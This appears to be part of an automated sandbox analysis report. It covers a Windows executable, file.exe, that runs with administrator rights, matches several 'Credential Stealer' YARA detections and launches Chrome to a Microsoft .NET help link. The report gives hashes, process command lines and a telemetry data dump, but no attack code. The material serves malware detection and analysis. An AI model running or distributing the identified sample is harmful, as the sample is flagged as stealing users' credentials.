                                                                                                                                                                                            2024-11-20 20:06:03 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:15:03:59
                                                                                                                                                                                            Start date:20/11/2024
                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                            Imagebase:0x1d0000
                                                                                                                                                                                            File size:1'910'784 bytes
                                                                                                                                                                                            MD5 hash:1F9E0235A6C12BD12D8220185FAD9D04
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1763547491.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789605259.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1763473029.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1814476131.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1813653561.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:15:04:36
                                                                                                                                                                                            Start date:20/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                            Start time:15:04:37
                                                                                                                                                                                            Start date:20/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2008,i,3826648894822423509,4444800806446167080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:15:04:39
                                                                                                                                                                                            Start date:20/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:15:04:39
                                                                                                                                                                                            Start date:20/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,2029121025495776,18205823423671010898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Reset < >
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000003.2017435249.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_dd6000_file.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e53372fa5ee4144bcf90a5283d7d4770cdf4f4047c7597c50d1cba950f20ffd4
                                                                                                                                                                                              • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                                                                                                              • Opcode Fuzzy Hash: e53372fa5ee4144bcf90a5283d7d4770cdf4f4047c7597c50d1cba950f20ffd4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92